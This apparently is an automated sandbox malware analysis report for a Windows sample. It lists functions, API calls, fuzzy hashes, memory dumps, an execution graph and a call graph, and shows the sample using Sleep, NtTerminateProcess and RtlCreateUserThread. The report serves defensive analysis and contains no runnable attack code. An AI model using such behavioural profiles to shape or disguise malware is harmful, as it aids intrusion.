                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                          • String ID:
                                                                                          • API String ID: 938513278-0
                                                                                          • Opcode ID: 3f2557cafcd06dcba021e7bd90d791f3a4accec2f9e3d1f72da71f924073079b
                                                                                          • Instruction ID: f61e576fdd48633dfc17ec577e78af812181c97894a17836949014a9695cd5e4
                                                                                          • Opcode Fuzzy Hash: 3f2557cafcd06dcba021e7bd90d791f3a4accec2f9e3d1f72da71f924073079b
                                                                                          • Instruction Fuzzy Hash: 97F06232940310ABD624B776580771A37A0AB00759F61853FE404772D2CB7C59629A9F
                                                                                          Function 0040CD0B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBCMT ref: 0040CD1E
                                                                                            • Part of subcall function 0040CC79: ___BuildCatchObjectHelper.LIBCMT ref: 0040CCAF
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 0040CD35
                                                                                          • ___FrameUnwindToState.LIBCMT ref: 0040CD43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                          • String ID: bad exception
                                                                                          • API String ID: 2163707966-3837556057
                                                                                          • Opcode ID: b045b226de3f4ecbed08ad7a93543d248402277db8486c1c018a92193e619e5b
                                                                                          • Instruction ID: 1604b151629918fba5798a1d122ed43a6cc1dec5c0f6a69f20fd0794fc4e81a6
                                                                                          • Opcode Fuzzy Hash: b045b226de3f4ecbed08ad7a93543d248402277db8486c1c018a92193e619e5b
                                                                                          • Instruction Fuzzy Hash: 68012871400109FBDF126F51CC85EAA3E6AEF19344F00422AFC58241A1D73A9962EBA8
                                                                                          Function 0040C528 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00407BEC), ref: 0040C52B
                                                                                          • __malloc_crt.LIBCMT ref: 0040C55A
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040C567
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                          • String ID:
                                                                                          • API String ID: 237123855-0
                                                                                          • Opcode ID: 2c9a0001bed0213e2d823ebb639303df66c44cb3b4c28549192758dcaca86337
                                                                                          • Instruction ID: b908ba5a23823a147b76b2a1072a2c5cf161ed95f7bd4d935abcb33acaa7f7dc
                                                                                          • Opcode Fuzzy Hash: 2c9a0001bed0213e2d823ebb639303df66c44cb3b4c28549192758dcaca86337
                                                                                          • Instruction Fuzzy Hash: 44F0547B504130AACB256B35BCC58972629DAD536471A463BF402E3391F6389E4182A9
                                                                                          Function 0040ADB2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __calloc_crt
                                                                                          • String ID: E{
                                                                                          • API String ID: 3494438863-2379582470
                                                                                          • Opcode ID: 7dae7d2af7243379b35f2130778606bf18b7b0e091d1f663d1d74641df695bb4
                                                                                          • Instruction ID: 21273b039d65140231fe6fc662b09ed089a621e42ebc47ac4460ab18e1a39cb8
                                                                                          • Opcode Fuzzy Hash: 7dae7d2af7243379b35f2130778606bf18b7b0e091d1f663d1d74641df695bb4
                                                                                          • Instruction Fuzzy Hash: 8D1194313447114BE7284E2DBC55B662292AF84724764823BE611EA3E0F77CCCA1829E
                                                                                          Function 0040645D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00406479
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DD7
                                                                                            • Part of subcall function 00406DC2: __CxxThrowException@8.LIBCMT ref: 00406DEC
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DFD
                                                                                            • Part of subcall function 004063F7: std::_Xinvalid_argument.LIBCPMT ref: 0040640A
                                                                                          • _memmove.LIBCMT ref: 004064D4
                                                                                          Strings
                                                                                          • invalid string position, xrefs: 00406474
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                          • String ID: invalid string position
                                                                                          • API String ID: 3404309857-1799206989
                                                                                          • Opcode ID: 84c79e6f14dbaa8a65dc4cdbdbeab40ee90c4a20ff14038d5d74f5b32ef93ac3
                                                                                          • Instruction ID: 13ed7ad951800ee43118e148254108be5ec5ecc04a157a2c78612866fc184e3e
                                                                                          • Opcode Fuzzy Hash: 84c79e6f14dbaa8a65dc4cdbdbeab40ee90c4a20ff14038d5d74f5b32ef93ac3
                                                                                          • Instruction Fuzzy Hash: 921127313002109BDB24AF09C940A2AB3A5EB81724F12093FF857AB3C1CBB9D965C79D
                                                                                          Function 00406254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0040626C
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DD7
                                                                                            • Part of subcall function 00406DC2: __CxxThrowException@8.LIBCMT ref: 00406DEC
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DFD
                                                                                          • _memmove.LIBCMT ref: 004062A5
                                                                                          Strings
                                                                                          • invalid string position, xrefs: 00406267
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: invalid string position
                                                                                          • API String ID: 1785806476-1799206989
                                                                                          • Opcode ID: d78e944ce26cc57a3af280aff1534d32ea17bfeabb8d4485b140397885432934
                                                                                          • Instruction ID: c343e07130b7aaef91a56eb7dd84709c1f31448c6ed5a0ef5cdcafd5e8cc6145
                                                                                          • Opcode Fuzzy Hash: d78e944ce26cc57a3af280aff1534d32ea17bfeabb8d4485b140397885432934
                                                                                          • Instruction Fuzzy Hash: A801B9313002019BD724ADA8D9C4827B3A6EBC57107254D7ED483A7781DA79EC5A83A8
                                                                                          Function 00405CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00405D42
                                                                                            • Part of subcall function 0040665E: std::ios_base::_Tidy.LIBCPMT ref: 0040667F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::ios_base::_$Ios_base_dtorTidy
                                                                                          • String ID: P\@$\@
                                                                                          • API String ID: 3167631304-203796801
                                                                                          • Opcode ID: 5a6f995303060cf12f29389a6f1b783509563790996d7ad64d5ccf3ceac7200d
                                                                                          • Instruction ID: ba725d234f76f40850094764542e060609f3fd00921f339c6d30fdea895b1c1a
                                                                                          • Opcode Fuzzy Hash: 5a6f995303060cf12f29389a6f1b783509563790996d7ad64d5ccf3ceac7200d
                                                                                          • Instruction Fuzzy Hash: 090192F12047809FC304DF08C885B5ABBE5FB99324F144A2EE555673D1D3799949CB91
                                                                                          Function 0040CA84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040843F: __getptd.LIBCMT ref: 00408445
                                                                                            • Part of subcall function 0040843F: __getptd.LIBCMT ref: 00408455
                                                                                          • __getptd.LIBCMT ref: 0040CA93
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040CAA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                          • String ID: csm
                                                                                          • API String ID: 803148776-1018135373
                                                                                          • Opcode ID: cae9b50dc7f6432ec1505a64cd449dab0dc25dd03ad835a6cc2e83fcb2bce8e3
                                                                                          • Instruction ID: 8568da162aace3ff8ac6162b233600a3016fb49417daab1ff872a19e8f129228
                                                                                          • Opcode Fuzzy Hash: cae9b50dc7f6432ec1505a64cd449dab0dc25dd03ad835a6cc2e83fcb2bce8e3
                                                                                          • Instruction Fuzzy Hash: E0010435900209CACB24DFA5D4907AEB2B5AB18311F548A3FE441762D1DF7889929E59
                                                                                          Function 0040AC67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(?,0040ACA0,00000000,00000000,00000000,00000000,00000000,00411B18,?,0040B6FB,00000003,00407582,00000001,00000000,00000000), ref: 0040AC72
                                                                                          • __invoke_watson.LIBCMT ref: 0040AC8E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: DecodePointer__invoke_watson
                                                                                          • String ID: PNfw
                                                                                          • API String ID: 4034010525-1837848778
                                                                                          • Opcode ID: fc1246884e7f51e9a6e838d80ca4524e67ea3e9af8508650a10a873421f72757
                                                                                          • Instruction ID: 9cbf56c96acde9d93f256939c6b649d798a3283f2b12c158bae67b724239cf21
                                                                                          • Opcode Fuzzy Hash: fc1246884e7f51e9a6e838d80ca4524e67ea3e9af8508650a10a873421f72757
                                                                                          • Instruction Fuzzy Hash: C6E08C32004209BBDF012F62DC0A8AA3F66EF44380B454835FE1490031D636C870DB99
                                                                                          Function 00405D90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 00405DC0
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00405DD7
                                                                                            • Part of subcall function 00407A84: _malloc.LIBCMT ref: 00407A9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID: K@
                                                                                          • API String ID: 4063778783-2724022444
                                                                                          • Opcode ID: ca18dc120c1246c491a23780bdf6e71784062208f2a468cac672bf6f67ff6a58
                                                                                          • Instruction ID: f5b831de26191e14911e530ecdcf1c5ceaadc4d48ff9e68cb0d8964d3cef158d
                                                                                          • Opcode Fuzzy Hash: ca18dc120c1246c491a23780bdf6e71784062208f2a468cac672bf6f67ff6a58
                                                                                          • Instruction Fuzzy Hash: 50E065715193015AD318EB61D55575F72949F90704F14863FB945A11D0EB38D908C96B
                                                                                          Function 004051B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 004051B9
                                                                                            • Part of subcall function 004073EC: std::exception::operator=.LIBCMT ref: 00407405
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exceptionstd::exception::operator=
                                                                                          • String ID: PK@$PK@
                                                                                          • API String ID: 1598257956-2775078312
                                                                                          • Opcode ID: 6f6ef18ac4411784d2c6e4b971746cbe18b15b3627a4610f38059c669408bcb7
                                                                                          • Instruction ID: 81a9b114ff360e73fd01696416a0da47fd08a242cc9308c949470c5ada236261
                                                                                          • Opcode Fuzzy Hash: 6f6ef18ac4411784d2c6e4b971746cbe18b15b3627a4610f38059c669408bcb7
                                                                                          • Instruction Fuzzy Hash: AED0ECB16046119BC3249F199800846F7F8FFA5320301892FA59897740D3B4A850CB98

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:23
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 667 402ad1 668 402ad2 667->668 670 402b56 668->670 671 40180c 668->671 672 40181b 671->672 673 40183e Sleep 672->673 675 401859 673->675 674 40186a NtTerminateProcess 676 401876 674->676 675->674 676->670 685 401818 686 40181b 685->686 687 40183e Sleep 686->687 688 401859 687->688 689 40186a NtTerminateProcess 688->689 690 401876 689->690 691 402a9d 692 402ad2 691->692 693 40180c 2 API calls 692->693 694 402b56 692->694 693->694 677 402bef 678 402cef 677->678 679 402c19 677->679 679->678 679->679 680 402c91 RtlCreateUserThread 679->680 680->678

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_00402BEF 28 Function_004025EF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                                                                                          Executed Functions

                                                                                          Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                                                                                          • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                                                                                          Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                                                                                          • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                                                                                          Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                                                                                          • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                                                                                          Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                                                                                          • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                                                                                          Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1576271958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                                                                                          • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                                                                                          Function 00402BEF Relevance: 1.6, APIs: 1, Instructions: 123threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 100 402bef-402c13 101 402c19-402c2b 100->101 102 402cef-402cf4 100->102 101->102 103 402c31-402c42 101->103 104 402c44-402c4d 103->104 105 402c52-402c60 104->105 105->105 106 402c62-402c69 105->106 107 402c72-402c88 106->107 108 402c6b 106->108 110 402c8a-402c8f 107->110 108->104 109 402c6d-402c70 108->109 109->110 110->102 111 402c91-402ced RtlCreateUserThread 110->111 111->102
                                                                                          APIs
